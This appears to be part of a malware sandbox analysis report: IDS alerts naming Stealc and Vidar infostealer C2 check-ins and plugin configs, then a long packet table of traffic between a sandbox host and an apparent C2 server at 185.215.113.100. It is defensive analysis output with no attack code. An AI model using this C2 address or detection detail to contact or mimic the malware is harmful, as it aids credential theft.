2024-08-30T00:48:02.061081+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-30T00:48:12.452365+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-30T00:48:08.158058+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-30T00:48:10.036605+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-30T00:48:00.041454+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	49704	80	192.168.2.5	185.215.113.100
2024-08-30T00:48:12.906494+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100
2024-08-30T00:47:59.792672+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49704	80	192.168.2.5	185.215.113.100
2024-08-30T00:48:00.298577+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	80	49704	185.215.113.100	192.168.2.5
2024-08-30T00:48:09.396625+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49704	80	192.168.2.5	185.215.113.100

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 00:47:58.672013044 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:47:58.689693928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:47:58.689945936 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:47:58.690099955 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:47:58.697518110 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:47:59.513787985 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:47:59.513849974 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:47:59.529089928 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:47:59.533914089 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:47:59.792609930 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:47:59.792671919 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:47:59.793852091 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:47:59.798654079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.041354895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.041373014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.041454077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.042754889 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.047504902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.291481018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.291528940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.291538954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.291547060 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.291567087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.291570902 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.291580915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.291593075 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.291604996 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.291634083 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.292505980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.292558908 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.292591095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.292632103 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.293819904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.298577070 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.540582895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.540654898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.558813095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.558847904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:00.564436913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.564455986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.564471006 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.564795017 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.564804077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.565320015 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:00.565329075 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:01.526921034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:01.527095079 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:01.811342955 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:01.816356897 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.060964108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.061080933 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.061115026 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.061129093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.061170101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.061342955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.061355114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.061367035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.061393023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.061414957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.062030077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.062079906 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.062087059 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.062099934 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.062131882 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.062899113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.062911034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.062921047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.062947989 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.062968016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.322633028 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.322657108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.322715044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.322721004 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.322727919 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.322738886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.322752953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.322762966 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.322763920 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.322767973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.322808981 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.322829962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.322841883 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.322853088 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.322921038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323002100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323015928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323026896 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323031902 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323043108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323046923 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323056936 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323061943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323075056 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323076010 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323091984 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323111057 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323276043 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323293924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323314905 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323337078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323342085 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323350906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323363066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323374987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323375940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323395014 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323410034 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323575020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323594093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323606968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.323623896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.323657036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.360923052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.360990047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.361036062 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.361078978 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.361200094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.361248016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.361267090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.361279964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.361306906 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.361324072 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.361329079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.361365080 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.361862898 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.361908913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.361911058 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.361922979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.361944914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.361960888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.362377882 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.362423897 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.362431049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.362445116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.362468958 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.362483025 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.362528086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.362572908 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.363158941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.363171101 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.363182068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.363204956 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.363234997 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.363296986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.363343000 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.363934040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.363964081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.363976955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.363984108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.364005089 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.364016056 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.364043951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.364084005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.364716053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.364763021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.364772081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.364784956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.364814043 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.364824057 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.364859104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.364902020 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.365550041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.365613937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.365622997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.365639925 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.365658045 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.365674019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.365711927 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.365755081 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.366403103 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.366415024 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.366426945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.366451025 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.366476059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.366482019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.366518974 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.367259979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.367305040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.367304087 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.367321968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.367341995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.367342949 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.367362022 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.367382050 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.367971897 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.368016005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.368207932 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.368254900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.368285894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.368299007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.368329048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.368333101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.368367910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.369071960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.369085073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.369096041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.369112015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.369132996 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.369138956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.369178057 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.369812012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.369878054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.526916027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527163982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527174950 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527178049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527189970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527201891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527210951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527214050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527232885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527240038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527244091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527256966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527267933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527292013 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527312040 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527359962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527385950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527398109 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527405977 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527409077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527431965 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527458906 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527467012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527507067 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527556896 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527597904 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527630091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527642012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527673006 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527698040 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527723074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527734995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527762890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527776957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527853966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527895927 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527896881 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527909040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.527936935 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527947903 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.527971983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528017998 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528062105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528074026 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528099060 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528115034 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528214931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528243065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528255939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528265953 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528278112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528300047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528398991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528409958 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528420925 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528431892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528440952 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528461933 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528496027 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528609991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528621912 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528633118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528645039 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528655052 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528656006 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528685093 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528693914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528887033 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528901100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.528929949 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.528942108 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.529149055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529190063 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.529234886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529247046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529274940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.529293060 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.529314995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529326916 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529336929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529350042 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.529350996 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529370070 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.529402971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.529578924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529593945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529604912 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529616117 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529623985 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.529630899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529644012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529644012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.529655933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.529671907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.529691935 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.530050993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530091047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.530109882 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530122042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530152082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.530173063 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.530242920 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530255079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530266047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530277967 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530284882 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.530307055 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.530332088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:02.530483961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530497074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530508041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530519009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530530930 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:02.530531883 CEST	49704	80	192.168.2.5	185.215.113.100
